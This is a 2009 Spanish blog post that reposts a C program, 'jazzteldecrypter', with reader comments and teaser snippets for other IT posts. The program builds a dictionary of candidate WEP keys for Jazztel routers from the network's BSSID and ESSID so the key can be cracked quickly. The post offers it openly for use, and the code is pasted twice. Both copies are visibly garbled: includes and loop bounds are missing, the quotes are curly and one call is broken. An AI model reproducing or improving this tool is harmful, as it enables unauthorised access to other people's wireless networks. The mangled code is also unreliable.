Desencriptar WIFIS Jazztel

March 29th, 2009 | 5 Comments | Posted in Linux, Seguridad

Zona Wifi Después del día que me he pegado hoy reconfigurando firewalls, routers, switches y la forma de ver las cosas con más calma, me he encontrado este código que proviene del de nilp0inter.

#include
#include
#include 
 
//
// Numero de modelos de routers en la base de datos
//
#define MAXROUTER 12
#define MAXINDEX 1
#define VERSION 0
#define SUBVERSION 0 
 
//
// Tipo de dato Router, con toda la informacion
//
typedef struct Router
{
	char bssid[9];
	char init[MAXINDEX][8];
	char notas[30];
} tRouter;
 
//
// Variables globales
//
char hex[16]="0123456789ABCDEF";
 
//
// Funciones
//
void initRouters(tRouter routers[MAXROUTER]);
void datosRouters(tRouter routers[MAXROUTER]);
void muestraAyuda();
int buscaBssid(tRouter routers[MAXROUTER], char *bssid);
void imprimeClaves(FILE *fichero, tRouter routers[MAXROUTER], int bssidId, char *keyEnd);
 
//
// MAIN !!!
//
int main(int argc, char *argv[])
{
	int bssidId, i;
	int validHex=0;
	char endKey[2];
	tRouter routers[MAXROUTER];
	FILE *fichero;
 
	if(argc&lt;3 || argc&gt;4)
	{
		muestraAyuda();
		return 1;
	}
 
	fprintf(stderr, "njazzteldecrypter %i.%i - (c) 2008 nilp0inter2k6n", VERSION, SUBVERSION);
 
	if(strlen(argv[1])!=17)
	{
		fprintf(stderr," [-] Longitud de BSSID invalidan");
		return 1;
	}
 
	initRouters(routers);
	datosRouters(routers);
 
	bssidId=buscaBssid(routers, argv[1]);
 
	if(bssidId==-1)
	{
		fprintf(stderr, " [-] BSSID no encontradon");
		return 1;
	}
	else
	{
		fprintf(stderr, " [+] BSSID: %sn"
				" [+] Modelo: %sn", argv[1], routers[bssidId].notas);
 
		for(i=0;i3) // Fichero
				{
 
					fprintf(stderr," [+] Fichero de claves: %sn", argv[3]);
					fichero=fopen(argv[3], "a+");
					if(fichero!=NULL)
					{
						imprimeClaves(fichero,routers,bssidId,endKey);
						fclose(fichero);
						fprintf(stderr, " [+] Fichero guardadon");
					}
					else
					{
						fprintf(stderr," [-] Error al abrir el ficheron");
						return 1;
					}
				}
				else
				{
					fprintf(stderr," [+] Seleccionada salida estandarn");
					imprimeClaves(stdout,routers,bssidId,endKey);
				}
			}
		}
 
	}
 
	return 0;
}	
 
//
// Vacia la estructura routers
//
void initRouters(tRouter routers[MAXROUTER])
{
	int i,j;
	for(j=0;j  [output file]nn");
}
 
//
// Busca el bssid en la estructura y devuelve el identificador o
//  -1 si no existe
//
int buscaBssid(tRouter routers[MAXROUTER], char *bssid)
{
	int i;
 
	for(i=0;i
argv[2][i]=toupper(argv[2][i]);

if(strlen(argv[2]) != 10 || strncmp(“JAZZTEL_”, argv[2], != 0 )
{
fprintf(stderr, ” [-] ESSID: %s invalido!!\n”, argv[2]);
return 1;
}
else
{
for(i=0;i
{
if(argv[2][8]==hex[i])
{
validHex++;
break;
}
}
for(i=0;i
{
if(argv[2][9]==hex[i])
{
validHex++;
break;
}
}

if(validHex!=2)
{
fprintf(stderr, ” [-] ESSID: %s invalido!!\n”, argv[2]);
return 1;
}
else
{
endKey[0]=argv[2][8];
endKey[1]=argv[2][9];

fprintf(stderr,” [+] ESSID: %s\n”, argv[2]);

if(argc>3) // Fichero
{

fprintf(stderr,” [+] Fichero de claves: %s\n”, argv[3]);
fichero=fopen(argv[3], “a+”);
if(fichero!=NULL)
{
imprimeClaves(fichero,routers,bssidId,endKey);
fclose(fichero);
fprintf(stderr, ” [+] Fichero guardado\n”);
}
else
{
fprintf(stderr,” [-] Error al abrir el fichero\n”);
return 1;
}
}
else
{
fprintf(stderr,” [+] Seleccionada salida estandar\n”);
imprimeClaves(stdout,routers,bssidId,endKey);
}
}
}

}

return 0;
}

//
// Vacia la estructura routers
//
void initRouters(tRouter routers[MAXROUTER])
{
int i,j;
for(j=0;j
{
strcpy(routers[j].bssid,”");
for(i=0;i<5;i++)
strcpy(routers[j].init[i],”");
strcpy(routers[j].notas,”");
}
}

//
// Introduce los datos de los modelos conocidos
//
void datosRouters(tRouter routers[MAXROUTER])
{
int i =0;
// Comtrend
strcpy(routers[i].bssid,”00:1A:2B\0″);
strcpy(routers[i].init[0],”E001D20\0″);
strcpy(routers[i].notas,”Comtrend\0″);
i++;
}

//
// Muestra la ayuda del programa
//
void muestraAyuda()
{
fprintf(stderr, “\njazzteldecrypter %i.%i – (c) 2008 nilp0inter2k6\n”, VERSION, SUBVERSION);

fprintf(stderr, ” uso: jazzteldecrypter [output file]\n\n”);
}

//
// Busca el bssid en la estructura y devuelve el identificador o
// -1 si no existe
//
int buscaBssid(tRouter routers[MAXROUTER], char *bssid)
{
int i;

for(i=0;i
bssid[i]=toupper(bssid[i]);

for(i=0;i
{
if(strncmp ( routers[i].bssid, bssid, 8 ) == 0)
return i;
}

return -1;
}

//
// Imprime las claves en un fichero
//
void imprimeClaves(FILE *fichero, tRouter routers[MAXROUTER], int bssidId, char *keyEnd)
{
int i,j,k,l,index=0;

while(index
{
for(i=0;i<16;i++)
for(j=0;j<16;j++)
for(k=0;k<16;k++)
for(l=0;l<16;l++)
{
fprintf(fichero, “%s%c%c%c%c%c%c\n”,routers[bssidId].init[index],hex[i],hex[j],hex[k],hex[l],keyEnd[0],keyEnd[1]);
}
index++;
}

}

Con esto lo que creamos es un diccionario para encontrar la clave WEP con un mínimo de iv's (5 en concreto).

Espero que lo disfruteis.

Leave a Reply 4668 views, 3 so far today |

Follow Discussion

5 Responses to “Desencriptar WIFIS Jazztel”

Profesorgame Says:
May 16th, 2009 at 12:21
Tiene muy buena pinta, pero como se usa exactamente??

(Creo que hay que usarlo desde el cmd, con el comando cd ir hasta el directorio, pero no se que comando usar…)
Bosco Says:
May 23rd, 2009 at 13:11
Lo primero que necesitas es tener un compilador de C, para poder ejecutar dicho código desde la consola.
Una vez lo tengas compilado es solo lanzarlo desde la consola.
Udaia Says:
May 25th, 2009 at 12:54
Perdona pero el código está cortado, no acaba, ¿puedes completarlo? Gracias
Bosco Says:
May 26th, 2009 at 21:34
Ya lo tienes completo
KlANDES Says:
June 8th, 2009 at 13:07
Hola muy buenas.
Tiene buena pinta el codigo, pero al principio de todo no aparecen las librerias no?

#include ¿?

Si debe ser asi o lo dejan en blanco para que tu las indiques, es decir si es una pregunta estupida disculpen mi ignorancia, es que la programacion no es lo mio.

Un saludo

Deja un mensaje

Script taréas de mantenimiento

En una red corporativa de bastantes pc’s realizar tareas de mantenimiento de los equipos, es algo tedioso, y los usuarios no siempre permiten que les utilices su equipo, así que se me ocurrió el generar un script que realizara las tareas de mantenimiento y añadirlo al script de cierre de sesión. Lo primero que hice [...]

Comandos utilizando Escritorio Remoto (RDP)

Hace ya un tiempo que estoy utilizando la última versión del cliente de Escritorio Remoto de Windows, el cual, trae algunas novedades interesantes que os paso a listar: Web Single sign-on (SSO) y formularios web de autentificación. Acceso a escritorios virtuales utilizando RD Connection Broker. Estado de conexión en el system tray Redirección del reproductor [...]

Recuperar Active Directory desde AD Restore Mode

Hoy asistí a una avería algo curiosa y que me ha dejado el gusanillo por dentro. Como no teníamos permiso para tocar solamente se nos solicitaba levantar el servidor y que el Dpto. de Sistemas del cliente realizara las operaciones oportunas, me he limitado a realizar lo que se solicitaba. El caso es el siguiente: [...]

Integrando Active Directory en tus scripts de PHP

Desde hace 5 meses estoy desarrollando un sistema web para la gestión y administración de incidencias, lógicamente lo hago en mis ratos libres y para eso no en todos sino solo cuando tengo realmente ganas de picar código o estoy realmente aburrido. Una de las cosas que querían integrar en el sistema era que la [...]

Kit indispensable para un técnico [PARTE II]

Al igual que siempre he considerado que poseer las herramientas necesarias y tener un buen kit de material es necesario, lo considero igual de importante llevar el software adecuado para cada momento. En un pendrive se pueden llevar un montón archivos, directorios sin sentido y al final creamos un nuevo concepto de baúl de los [...]

Modo desatendido Active Directory

Hoy he preparado un webcast sobre migraciones de sistemas operativos, bases de datos y exchange. Cuando he terminado me ha picado el gusanillo de automatizar aun más las tareas y buscar métodos que me permitan realizar las tediosas tareas de migración de una forma más automática y quitándote las preocupaciones de la cabeza. Buscando y [...]

Comandos básicos de windows

Es común que se de por sentado que todo el mundo conoce los comandos básicos de windows, pero cada vez me encuentro más casos en los que la gente no tiene ni idea de lo que se puede llegar a ver o ejecutar desde consola, y si le tienes las cosillas capadas se vuelven locos. [...]